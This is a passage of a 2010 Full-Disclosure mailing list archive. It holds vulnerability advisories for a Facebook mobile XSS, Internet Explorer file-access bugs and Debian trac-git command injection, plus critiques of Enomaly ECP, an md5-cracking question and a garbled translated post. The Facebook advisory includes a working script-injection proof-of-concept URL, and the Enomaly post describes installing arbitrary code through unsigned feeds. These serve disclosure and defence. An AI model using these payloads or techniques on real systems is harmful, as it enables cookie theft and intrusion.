http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.7.4-1.1+lenny1_powerpc.deb Size/MD5 checksum: 161734 c4ae4d50ee835cd87e8ffbc2083a6f9f s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.7.4-1.1+lenny1_s390.deb Size/MD5 checksum: 162644 68e1ef64d38ea794a096f142e6fefb5c http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.7.4-1.1+lenny1_s390.deb Size/MD5 checksum: 131750 c727c3d3652f50e366c6208d05d2087b http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.7.4-1.1+lenny1_s390.deb Size/MD5 checksum: 18780 75791fd3ebd09343e21baa7664425abd sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/f/fuse/libfuse-dev_2.7.4-1.1+lenny1_sparc.deb Size/MD5 checksum: 153900 17372c54b216f06f37622154f69477ff http://security.debian.org/pool/updates/main/f/fuse/libfuse2_2.7.4-1.1+lenny1_sparc.deb Size/MD5 checksum: 120200 45a7e205d213ba40869c74f8d6caf9e7 http://security.debian.org/pool/updates/main/f/fuse/fuse-utils_2.7.4-1.1+lenny1_sparc.deb Size/MD5 checksum: 17974 47802bb266babbf313f1d285f6aad652 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAktorcQACgkQNxpp46476aq2ygCeOuipMSFahwlsgcr7/KxU17e0 oGUAnRKa5Ucxz8UsCMpb64LjaNKSsgDX =SXN1 -----END PGP SIGNATURE----- From advisories at isecauditors.com Wed Feb 3 09:10:55 2010 From: advisories at isecauditors.com (ISecAuditors Security Advisories) Date: Wed, 03 Feb 2010 10:10:55 +0100 Subject: [Full-disclosure] [ISecAuditors Security Advisories] Facebook HTML and Script code injection vulnerability Message-ID: <4B693D9F.6050906@isecauditors.com> ============================================= INTERNET SECURITY AUDITORS ALERT 2010-001 - Original release date: January 8th, 2010 - Last revised: February 3rd, 2010 - Discovered by: Juan Galiana Lara - Severity: 6.3/10 (CVSS Base Score) ============================================= I. VULNERABILITY ------------------------- Facebook HTML and Script code injection vulnerability II. BACKGROUND ------------------------- Facebook is a social networking website that is operated and privately owned by Facebook, Inc. Users can add friends and send them messages, and update their personal profiles to notify friends about themselves. Additionally, users can join networks organized by city, workplace, school, and region. The website's name stems from the colloquial name of books given at the start of the academic year by university administrations with the intention of helping students to get to know each other better. III. DESCRIPTION ------------------------- The mobile interface of Facebook social network is affected by Cross-Site Scripting vulnerability due variable "q" is not properly sanitized in http://m.facebook.com/friends.php. An attacker can inject HTML or script code in the context of victim's browser, so can perform XSS attacks, and steal cookies of a targeted user. IV. PROOF OF CONCEPT ------------------------- http://m.facebook.com/friends.php?q=%3Cscript%3Ealert(%22XSS%22)%3B%3C%2Fscript%3E V. BUSINESS IMPACT ------------------------- An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal user targeted cookies. VI. SYSTEMS AFFECTED ------------------------- Facebook VII. SOLUTION ------------------------- Corrected VIII. REFERENCES ------------------------- http://www.facebook.com http://www.isecauditors.com http://juangaliana.blogspot.com IX. CREDITS ------------------------- This vulnerability has been discovered by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com). X. REVISION HISTORY ------------------------- January 8, 2010: Initial release. February 3, 2010: Last revision. XI. DISCLOSURE TIMELINE ------------------------- January 2, 2010: Discovered by Internet Security Auditors. January 9, 2010: Vendor contacted including PoC. No response. January 11, 2010: Second contact. No response. January 19, 2010: Third contact. No response. January 20, 2010: Vulnerability corrected without any kind of contact. January 31, 2010: Response from Facebook Security member requiring info. February 3, 2010: Sent to lists for public interest. XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information. From samj at samj.net Wed Feb 3 07:36:15 2010 From: samj at samj.net (Sam Johnston) Date: Wed, 3 Feb 2010 08:36:15 +0100 Subject: [Full-disclosure] Private cloud security is no security at all Message-ID: <21606dcf1002022336x5539f021o5b8a89e12d6c3251@mail.gmail.com> Private cloud security is no security at all It's ironic that the purveyors of "Private Cloud" sell their wares on the premise of enhanced privacy and security - a totally unjustified claim which is too often accepted without question - and that they are quick to dismiss the huge benefit of the armies of security boffins employed by "public" cloud vendors (whose future is largely dependent on keeping customer data safe). It's also very convenient for them that the term itself is disparaging of "public" cloud in the same way that "Blog With Integrity" badges imply that the rest of us are somehow unethical (one of the main reasons I personally have and will always dislike[d] it). It is with that in mind that I was intrigued by Reuven Cohen 's announcement today regarding Enomaly, Inc. having recently joined the Intel Cloud Builder Program (whatever that is). It was these two quotes that I found particularly questionable regarding their Enomaly ECP product: 1. *Intel was among the first to full(sic) understand the opportunity in enabling a truly secure virtualized cloud computing environments(sic) for service providers and Telco's.* 2. *Our work with the Intel Cloud Builder Program will help to accelerate our efforts to deliver a massively-scalable, highly-available, high-security cloud platform to our customers.* The reason I'm naturally suspicious of such claims is that I've already discovered a handful of critical security vulnerabilities in this product (and that's without even having to look beyond the startup script - a secure-by-default turbogears component that was made insecure through inexplicable modifications): 1. CVE-2008-4990 Enomaly ECP/Enomalism: Insecure temporary file creation vulnerabilities 2. CVE-2009-0390: Argument injection vulnerability in Enomaly Elastic Computing Platform (ECP) 3. Enomaly ECP/Enomalism: Multiple vulnerabilities in enomalism2.sh (redux) I had to dig a little (but not much) deeper for the silent update remote command execution vulnerability . I also inadvertently discovered another serious security vulnerability (sending corporate BestBuy credentials in the clear over the Internet to a 3rd party service ), which as it turns out was also developed by Enomaly, Inc. It's only natural that I would be suspicious of any future security claims made by this company. It doesn't help my sentiment either that every last trace of the Open Source ECP Community Edition was recently scrubbed from the Internet without notice, leaving angry customers high and dry , purportedly pending the "rejigging [of their] OSS strategy". While my previous attempts to fork the product as Freenomalism failed when we were unable to get the daemon to start, having the code in any condition is better than not having it at all. In my opinion this is little more than blatantly (and successfully I might add) taking advantage of the Open Source community for as long as necessary to get the product into the limelight. Had they not filled this void others would certainly have done so, and the Open Cloud would be better off today as a result. As part of cloud standards work I was interested in taking a look at the "secure" mechanism they developed for distributing virtual machines: *VMcasting is an automatic virtual machine deployment mechanism based on RSS2.0 whereby virtual machine images are transferred from a server to a client which securely delivers files containing a technical specification and virtual disk image.* Another bold claim that initially appeared justified by a simple but relatively sensible embedding of crytpographically strong checksums into descriptor and manifest files that were in turn digitally signed using GPG. Unfortunately no consideration was given to the secure retrieval of the archive itself (nor the RSS feed listing the archives for that matter), nor were signatures actually required by the specification, meaning that it would be trivial for an attacker to insert their own unsigned packages and/or replace existing signed packages with modified, unsigned ones. Fortunately an attacker need not even go to these lengths as despite acknowledging the need for digital signatures in the VMcasting specification, none of the security features appear to have been implemented in Enomaly ECP itself. Worse still, it won't even let you use SSL if you're sensible enough to try: if url[0].lower not in ("http", "ftp"): raise E2UndefinedError(_("Unknown scheme in package URL.")) Think you're safe if you keep everything on your own network (that's the whole point, right?). Don't be so sure, as the vmfeed module quietly registers these HTTP URLs for you: - http://enomalism.com/vmcast_appliances.php [archived copy ] - http://enomalism.com/vmcast_modules.php [archived copy ] Sure enough if you retrieve the first URL you'll get a feed of "virtual appliances" like this one (delivered over HTTP from Amazon S3 no less) and as expected, if you untar it you'll see that there's no signatures. Don't get me started on the myriad vulnerabilities no doubt present within the appliances themselves given their age. But wait, there's more - being able to run workloads of your choice (e.g. trojan horses, network scanners, etc.) within your victim's network is one thing, and being able to obtain and reverse engineer their existing workloads (given there's no catering for authentication) another, but taking over the management system itself is where there's real fun to be had. Fortunately all you need to do is set the MIME type to application/python-eggrather than application/enomalism2-xvm2 and this little chestnut gets invoked, quietly unzipping and forcibly installing the supplied python module: elif self.get_mime()==EGG_MIME: tx.update("Installing Python egg.", 90) target=os.path.join(settings.repodir,\ self.get_uuid().replace("-","_")+".egg") shutil.move(filename, target) self.install_python_egg(target) The vmcast_modules feed currently advertises the e2_drivemounter , e2_exception and e2_phone_home modules which are all available for download, again over HTTP, from http://enomaly.com/fileadmin/eggs/. Anyway I'm sure there'll be backpedalling , downplaying , shooting-the-messenger, etc. which is why you're reading this here rather than in a vulnerability announcement. While the bugs are obviously unconfirmed this still illustrates my point nicely - don't take it for granted that private cloud offerings are secure, and in the unlikely event that the systems themselves are secure, don't assume you or your provider can run them in a more secure fashion than a "public" cloud provider could. Incidents like this go a long way towards realising one of my predictions for 2010 (or should I say @philww 's "considered prediction ") in that *Private clouds will be discredited by year end*. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100203/1a2d953a/attachment.html From yuange1975 at hotmail.com Wed Feb 3 16:16:17 2010 From: yuange1975 at hotmail.com (yuange) Date: Wed, 3 Feb 2010 16:16:17 +0000 Subject: [Full-disclosure] win7x64 Direct General Message-ID: win7x64 Direct General 2010-02-03 23:38 2010-02-03 23:38 ??????????????????????????????win7x64???????????????????????????????????????? Spend a day breaking the machine a good time to finally install win7x64, the result was universal pass to kill, I myself have had silently. microsoft???????????????????????????????????????????????????? microsoft does not pay to spend millions of years digging me, I'm sorry I really have the versatility of this procedure. http://translate.googleusercontent.com/translate_c?hl=zh-CN&sl=zh-CN&tl=en&u=http://hi.baidu.com/yuange1975/blog/item/022dec59443c4d212834f041.html&rurl=translate.google.cn&usg=ALkJrhg-C-arlz2AxJEkRSQznuAAoSqdNg#comment _________________________________________________________________ ??????????????????????????????????msn?????????? http://ditu.live.com/?form=TL&swm=1 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100203/d28f7231/attachment.html From larry at larryseltzer.com Wed Feb 3 16:24:28 2010 From: larry at larryseltzer.com (Larry Seltzer) Date: Wed, 3 Feb 2010 11:24:28 -0500 Subject: [Full-disclosure] win7x64 Direct General In-Reply-To: References: Message-ID: <9B9E7EA67E1B1342B2D25F3FD1B3293003365298@BE35.exg3.exghost.com> Wow, that??s a searing indictment if I??ve ever heard one, I think. Larry Seltzer Contributing Editor, PC Magazine larry_seltzer at ziffdavis.com http://blogs.pcmag.com/securitywatch/ From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of yuange Sent: Wednesday, February 03, 2010 11:16 AM To: full-disclosure Subject: [Full-disclosure] win7x64 Direct General win7x64 Direct General 2010-02-03 23:38 2010-02-03 23:38 ??????????????????????????????win7x64???????????????????????????????????????? Spend a day breaking the machine a good time to finally install win7x64, the result was universal pass to kill, I myself have had silently. microsoft???????????????????????????????????????????????????? microsoft does not pay to spend millions of years digging me, I'm sorry I really have the versatility of this procedure. http://translate.googleusercontent.com/translate_c?hl=zh-CN&sl=zh-CN&tl=en&u=http://hi.baidu.com/yuange1975/blog/item/022dec59443c4d212834f041.html&rurl=translate.google.cn&usg=ALkJrhg-C-arlz2AxJEkRSQznuAAoSqdNg#comment ________________________________ ????????????????????MSN?????? ?????????? -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100203/c08e7517/attachment.html From pppsss7 at gmail.com Wed Feb 3 20:42:07 2010 From: pppsss7 at gmail.com (Alex) Date: Wed, 3 Feb 2010 23:42:07 +0300 Subject: [Full-disclosure] anybody know good service for cracking md5? Message-ID: <10c48be51002031242h450c0589q953edd1fa79f3791@mail.gmail.com> i find some sites which says that they can brute md5 hashes and WPA dumps for 1 or 2 days. is it true? -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100203/e0794e89/attachment.html From advisories at coresecurity.com Wed Feb 3 21:17:10 2010 From: advisories at coresecurity.com (Core Security Technologies Advisories) Date: Wed, 03 Feb 2010 18:17:10 -0300 Subject: [Full-disclosure] CORE-2009-0625: Internet Explorer Dynamic OBJECT tag and URLMON sniffing vulnerabilities Message-ID: <4B69E7D6.1060900@coresecurity.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Internet Explorer Dynamic OBJECT tag and URLMON sniffing vulnerabilities 1. *Advisory Information* Title: Internet Explorer Dynamic OBJECT tag and URLMON sniffing vulnerabilities Advisory Id: CORE-2009-0625 Advisory URL: http://www.coresecurity.com/content/internet-explorer-dynamic-object-tag Date published: 2010-02-03 Date of last update: 2010-02-03 Vendors contacted: Microsoft Release mode: User release 2. *Vulnerability Information* Class: [CWE-497], [CWE-501], [CWE-612] Impact: Security bypass Remotely Exploitable: Yes Locally Exploitable: No Bugtraq ID: 38055, 38056 CVE Name: N/A, CVE-2010-0255 3. *Vulnerability Description* This advisory describes two vulnerabilities that provide access to any file stored in on a user's desktop system if it is running a vulnerable version of Internet Explorer. These vulnerabilities can be used in attacks combined with a number of insecure features of Internet Explorer to provide remote access to locally stored files without the need for any further action from the victim after visting a website controlled by the attacker. The vulnerabilities are simple variations of bugs disclosed previously in CoreLabs Security Advisories CORE-2008-0103 [1] and CORE-2008-0826 [2]. Exploitation of these vulnerabilities requires enticing users to click on URLs otherwise visit a malicious website controlled by the attacker but no further user interaction is needed. As a result an attacker would gain the ability to read any file stored on the user's desktop system but will not be able to fully compromise it to execute arbitrary code without restrictions. 4. *Vulnerable packages* . Internet Explorer 5.01 SP4 on Windows 2000 sp4 . Internet Explorer 6sp1 on Windows 2000 sp4 . Internet Explorer 6sp2 on Windows XP sp2 . Internet Explorer 6sp2 on Windows XP sp3 . Internet Explorer 7 on Windows XP sp2 . Internet Explorer 7 on Windows XP sp3 . Internet Explorer 7 on Windows Vista sp1 . Internet Explorer 7 on Windows Vista sp2 . Internet Explorer 7 on Windows Server 2003 sp2 if Protected Mode is OFF and not using Enhanced Security Configuration . Internet Explorer 7 on Windows Server 2008 i if Protected Mode is OFF and not using Enhanced Security Configuration . Internet Explorer 8 on Windows XP sp2 . Internet Explorer 8 on Windows XP sp3 . Internet Explorer 8 on Windows Vista sp1 if Protected Mode if OFF . Internet Explorer 8 on Windows Vista sp2 if Protected Mode is OFF . Internet Explorer 8 on Windows 7 if Protected Mode if OFF . Internet Explorer 8 on Windows Server 2003 sp2 if Protected Mode if OFF and not using Enhanced Security Configuration . Internet Explorer 8 on Windows Server 2008 R2 if Protected Mode is OFF and not using Enhanced Security Configuration 5. *Non-vulnerable packages* . Internet Explorer 7 on Windows Vista/Windows Server 2003/Windows 7 if Protected Mode is ON . Internet Explorer 8 on Windows Vista/Windows Server 2003 if Protected Mode is ON . Internet Explorer 8 on Windows Server 2003 if Protected Mode is ON . Internet Explorer 8 on Windows 7/Windows Server 2008 R2 if Protected Mode is ON 6. *Vendor Information, Solutions and Workarounds* The vendor has guidance on how to address these vulnerabilities in Microsoft Security Advisory (980088): http://www.microsoft.com/technet/security/advisory/980088.mspx To prevent exploitation of these vulnerabilities the following mitigations are possible: . Run Internet Explorer with Protected Mode [3] turned ON if it is supported by the operating system. This is default setting for the Internet security zone on Windows Vista, Windows 7 and Windows Server 2008. Note that there may be specific scenarios where protected mode may need to be turned off [4] . Use Internet Explorer's *Network Protocol Lockdown* feature control to restrict the 'file:' protocol to prevent HTML content from UNC paths from running scripting or ActiveX controls. Note that Network Protocol Lockdown may affect the functionality of Web applications that rely on relaxed security configurations of IE. . Set the Security Level setting to High for the Internet and Local Intranet security zones to prevent IE from running scripts or ActiveX controls. . Disable Active Scripting for the Internet and Local Intranet zones manually with a custom security setting. . Use a different web browser to navigate untrusted web sites. Additionally, disabling file sharing if it is not necessary and filtering outbound SMB connections at the endpoint or network perimeter are good security measures to prevent disclosure of sensitive information such as valid user, system and domain names that could be used to perform attacks that abuse the vulnerabilities described in this advisory. 7. *Credits* These vulnerabilities were discovered and researched by Jorge Luis Alvarez Medina and Federico Muttis from Core Security Technologies. 8. *Technical Description / Proof of Concept Code* The bugs in this advisory as well as a number of specific methods to combine them with insecure Internet Explorer features are discussed in the paper "Abusing Insecure Features of Internet Explorer"[5]. Exploitation of these vulnerabilities as well as others disclosed previously was explained in a presentation at the BlackHat DC 2010 technical security conference [6] 8.1. *URLMON sniffing vulnerability* In CoreLabs Security Advisory CORE-2008-0826 [2] a vulnerability that allowed attackers to gain access to any file on the local filesystem of a computer running vulnerable versions of Internet Explorer was disclosed. During the vulnerability reporting process Core provided Proof-of-Concept code to the vendor that successfully exploited the bug on Internet Explorer 8 which at the time was deemed not vulnerable by Microsoft because the bug had been patched prior to RTM. Upon further investigation, the vendor determined that the proof-of-concept provided by Core was actually exploiting a different bug than the one originally reported and therefore it should be considered a separate security issue. The URLMON sniffing vulnerability refers to the variant discovered in the CORE-2008-0826 time line. When loading a local file Internet Explorer's HTML rendering engine [7] will only check its MIME type to see if it is a positive match on the files it can handle. For unknown types that are treated as HTML because they've been referred to by a redirection, content type determination will default to 'text/html' in absence of a type explicitly set by the content source. In the case of non-html files for which there isn't an explicit content-type set, URLMON will default to the 'text/html' type as suggested from the redirection. As a result Internet Explorer will end up loading non-html local files and rendering them as HTML and running any scripting code included in the file in the context of the Security Zone assigned to the content's source. 8.2. *Dynamic OBJECT tag vulnerability* Microsoft's June 2009 Cumulative Security Update for Internet Explorer [8] included a patch to fix the bug reported in CORE-2008-0826. The fix was implemented as a modification to the MIME-type detection method when loading content specified in an 'OBJECT' tag. Thus, the contents of the index.dat file will not be rendered and shown to an Internet Explorer user if it is directly referenced from a webpage with the following HTML code: /----- - -----/ However the contents of the same file will be loaded and rendered if the following HTML code is used: /----- - -----/ 9. *Report Timeline* . 2009-04-17: Core Security Technologies sends proof-of-concept code for the URLMON sniffing vulnerability in IE8 to Microsoft. The code is deemed as an exploit variant for Internet Explorer bug that has already been patched in IE 8 but its part of an ongoing report for other IE versions. . 2009-06-01: Microsoft says that the PoC corresponds to a separate bug than the one reported in CORE-2008-0826. On a conference call Core Security Technologies indicates that it considers the bug just a variant of the previously reported one. Microsoft replies that although both cases appear to expose the same functionality the actions are actually controlled by different code and that the differences are significant enough to consider this a separate issue. Microsoft will further investigate and address it in a separate case. . 2009-06-10: Cumulative Security Update for Internet Explorer (MS09-019) is published . 2009-08-12: Core Security Technologies notified Microsoft of the dynamic OBJECT tag vulnerability. Draft advisory sent with publication date scheduled for September 8, 2009. . 2009-08-12: Microsoft's MSRC acknowledged the bug report and opened a new case. . 2009-08-31: Core asks for an update and reminds MSRC that September 8 2009 is the planned public disclosure date. . 2009-08-31: Microsoft replies agreeing that the reported bug is a variant of one previously reported by Core that was fixed in June 2009. Microsof indicates that all the solutions attempted so far did not prove effective and that it currently does not have an update to track towards a fix time. Asks if Core is still on track to disclose it in September 2009. . 2009-09-03: Core tells Microsoft that it moved the publication date to October 13 2009 and asks for the complete list of vulnerable platforms. Given that no security fixes for Internet Explorer are planned for September and that the reported bugs are simple variants of others that have been fixed before Core feels confident that the new release date should be appropriate to solve these issues. . 2009-09-04: Microsoft thanks Core for postponing publication and says that it is still discussing the fix plan and release date with the IE team and that it will get back to Core in a week with the list of vulnerable platforms and estimated patch release date. . 2009-10-09: Received a summary from Microsoft with an update on all open cases with Core. Internet Explorer cases appear listed as "working with product team to determine fix and release date. Earliest potential ship date for a fix is February 2010". . 2009-10-23: Core sends email to MSRC indicating that publication of the advisory has been re-scheduled to November 10 2009 and it is open to delaying it further up to the second Tuesday of December 2009 if MSRC is willing to provide: a)detailed technical explanations of the bugs, b)the full list of vulnerable platforms and c)a firm commitment to a release date for the fixes. Core also says that if Microsoft can not target the next IE patch release cycle, Core would rather publish the advisory to let other parties address the risk with alternative fixes or mitigations. The advisory will include the dynamic object tag bug as well as the URLMON sniffing vulnerability from the previous vulnerability report that is pending a fix. . 2009-11-02: Update from MSRC saying that it is collecting information and will send a response by Friday Nov. 6. . 2009-11-06: Core requests a status update . 2009-11-06: MSRC indicates that it will provide an update on Monday Nov. 9 . 2009-11-09: MSRC sends a status update with detailed descriptions about both bugs, the list of vulnerable platforms and says that it is still working on a tentative fix plan for one of the vulnerabilities. In the case of the other bug, Microsoft is targeting February 2009 to release the fix given that releasing updates in November and December may impact customers due to the typical high e-commerce in those months. . 2009-12-12: Core sends email to MSRC saying that advisory publication was now re-scheduled to February 9th, 2010 and asks if Microsoft is on track to release the fixes according to what was stated in previous communications. Core notes that Jorge Luis Alvarez Medina has just received confirmation from the BlackHat Technical Security conference that his submission for a talk discussing these bugs was accepted. His presentation is scheduled for the first week of February and the advisory publication was re-scheduled to a week after on February 9th assuming that Microsoft will issue patches on the same date. . 2010-01-06: Received a summary from Microsoft with an update on all open cases with Core. . 2010-01-06: Core reminds MSRC that the advisory disclosing two IE bugs pending resolution will be published on Feb. 9 2010 as noted in an email on December 12 2009. . 2010-01-22: Microsoft releases a Cumulative Security Update for Internet Explorer ahead of the regular patch release cycle. The update fixes several bugs but does not include fixes for the two IE cases tracked in this advisory. Core asks MSRC if Microsoft is planning to release another security update for IE during February and indicates that if no further updates are planned Core will publish this advisory simultaneously with the discoverer's presentation at the BlackHat security conference. . 2010-01-22: Email from MSRC requesting a conference call to talk about the presentation at the BlackHat DC conference in February . 2010-01-25: On a conference call with Core's Security Advisories team, MSRC indicates that fixes for the bugs will be released at some date in the future. Core reminds MSRC that the corresponding security advisory will be published on Feb. 3 on the same date that Jorge Luis Alvarez Medina will disclose details about the bugs and attack vectors at the BlackHat conference. MSRC requests a preview of the presentation slides. Core requests a preview of Microsoft's communications guidelines regarding Core's upcoming advisory and presentation. . 2010-02-02: BlackHat presentation slides sent to MSRC . 2010-02-02: Final draft of the advisory sent to Microsoft. Vulnerability identifiers requested from Mitre and SecurityFocus.com . 2010-02-03: CoreLabs Security Advisory CORE-2009-0625 published 10. *References* [1] CoreLabs Security Advisory CORE-2008-0103 Internet Explorer Zone Elevation restrictions bypass and Security Zone restrictions bypass. http://www.coresecurity.com/content/internet-explorer-zone-elevation [2] CoreLabs Security Advisory CORE-2008-0826 Internet Explorer Security Zone restrictions bypass. http://www.coresecurity.com/content/ie-security-zone-bypass [3] Understanding and Working in Protected Mode Internet Explorer. http://msdn.microsoft.com/en-us/library/bb250462(VS.85).aspx [4] Protected Mode for IE7 in Windows Vista - Is it On or Off? http://blogs.msdn.com/ie/archive/2007/04/04/protected-mode-for-ie7-in-windows-vista-is-it-on-or-off.aspx [5] Jorge Luis Alvarez Medina, Abusing Insecure Feature of Internet Explorer, Feb. 2010 http://corelabs.coresecurity.com/index.php?module=wiki%38action=attachment%38type=publication%38page=Abusing_insecure_features_of_Internet_Explorer-article.pdf [6] Jorge Luis Alvarez Medina, Internet Explorer turns your personal computer into a public File Server, BlackHat Technical Security conference, Feb. 2010, Washington D.C., USA. http://corelabs.coresecurity.com/index.php?module=wiki%38action=attachment%38type=publication%38page=Abusing_insecure_features_of_Internet_Explorer-BHDC2010-Slides.pdf [7] Wikipedia, Trident (layout engine). http://en.wikipedia.org/wiki/Trident_(layout_engine) [8] Microsoft Security Bulletin MS09-019, Cumulative Security Update for Internet Explorer, June 10 2009. http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAktp59YACgkQyNibggitWa3e/ACfS+zHvcSqTFyJrqR6D1fTKk6O GoUAmQEk6qwbnHFaodbAhQOw8kaPtuTO =/WSE -----END PGP SIGNATURE----- From Valdis.Kletnieks at vt.edu Wed Feb 3 21:26:42 2010 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Wed, 03 Feb 2010 16:26:42 -0500 Subject: [Full-disclosure] anybody know good service for cracking md5? In-Reply-To: Your message of "Wed, 03 Feb 2010 23:42:07 +0300." <10c48be51002031242h450c0589q953edd1fa79f3791@mail.gmail.com> References: <10c48be51002031242h450c0589q953edd1fa79f3791@mail.gmail.com> Message-ID: <504.1265232402@localhost> On Wed, 03 Feb 2010 23:42:07 +0300, Alex said: > i find some sites which says that they can brute md5 hashes and WPA dumps > for 1 or 2 days. Given enough hardware and a specified md5 hash, one could at least hypothetically find an input text that generated that hash. However, that may or may not be as useful as one thinks, as you wouldn't have control over what the text actually *was*. It would suck if you were trying to crack a password, and got the one that was only 14 binary bytes long rather than the one that was 45 printable characters long. ;) Having said that, it would take one heck of a botnet to brute-force an MD5 has in 1 or 2 days. Given 1 billion keys/second, a true brute force of MD5 would take on the order of 10**22 years. If all 140 million zombied computers on the internet were trying 1 billion keys per second, that drops it down to 10**16 years or so - or about 10,000 times the universe has been around already. I suspect they're actually doing a dictionary attack, which has a good chance of succeeding in a day or two. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 227 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100203/a8f8f6a6/attachment.bin From fw at deneb.enyo.de Wed Feb 3 21:15:11 2010 From: fw at deneb.enyo.de (Florian Weimer) Date: Wed, 03 Feb 2010 22:15:11 +0100 Subject: [Full-disclosure] [SECURITY] [DSA-1990-1] New trac-git packages fix code execution Message-ID: <87r5p2gevh.fsf@mid.deneb.enyo.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1990-1 security at debian.org http://www.debian.org/security/ Florian Weimer February 03, 2010 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : trac-git Vulnerability : shell command injection Problem type : remote Debian-specific: yes CVE Id(s) : CVE-2010-0394 Debian Bug : 567039 Stefan Goebel discovered that the Debian version of trac-git, the Git add-on for the Trac issue tracking system, contains a flaw which enables attackers to execute code on the web server running trac-git by sending crafted HTTP queries. The old stable distribution (etch) does not contain a trac-git package. For the stable distribution (lenny), this problem has been fixed in version 0.0.20080710-3+lenny1. For the unstable distribution (sid) and the testing distribution (squeeze), this problem has been fixed in version 0.0.20090320-1. We recommend that you upgrade your trac-git package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/t/trac-git/trac-git_0.0.20080710-3+lenny1.dsc Size/MD5 checksum: 1312 4357cd66c8df3ac03273f9f858d14928 http://security.debian.org/pool/updates/main/t/trac-git/trac-git_0.0.20080710-3+lenny1.diff.gz Size/MD5 checksum: 4262 af5bbdd092dfe8d953bcb2183c1228c4 http://security.debian.org/pool/updates/main/t/trac-git/trac-git_0.0.20080710.orig.tar.gz Size/MD5 checksum: 28505 c8220478c501b7ab3e6df97cea6d2e26 Architecture independent packages: http://security.debian.org/pool/updates/main/t/trac-git/trac-git_0.0.20080710-3+lenny1_all.deb Size/MD5 checksum: 16920 d91bf3dc4b15e1c999f7dc5e65e0de65 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJLafM5AAoJEL97/wQC1SS+ChkH/i8B9Iij86LWyp7vd8QI+XJb bgVkrtty7VjM/zjDGaPm3M6L6TeQLVVDzbVVPcZ3GkZO3sP5S+hqc5tc6der9soy fVtV44BIIydu8u0bDQIZD44k/mC6YzwATy7rxDLz0VAblUYmgMvlPWWbRE5TIR/e i+8bdqc7dEab0aBLNy3TwnytsVIpWZfaBOK7M49P131FV3j5W15GjYtlzP1PmyVn 0DhLrPB3KQ0l8XwdW3iSjMsWDcl3TlO7i1X6H9Ef7CXuWVYx7NDwbBnGRwx77sJB y6PI+cXRwWLHI89Dj8LUnS4KVZ+7Kgd5ALleJvhLy6W+WswanKjotafIeLB8Ems= =TLBg -----END PGP SIGNATURE----- From uuf6429 at gmail.com Wed Feb 3 22:02:20 2010 From: uuf6429 at gmail.com (Christian Sciberras) Date: Wed, 3 Feb 2010 23:02:20 +0100 Subject: [Full-disclosure] anybody know good service for cracking md5? In-Reply-To: 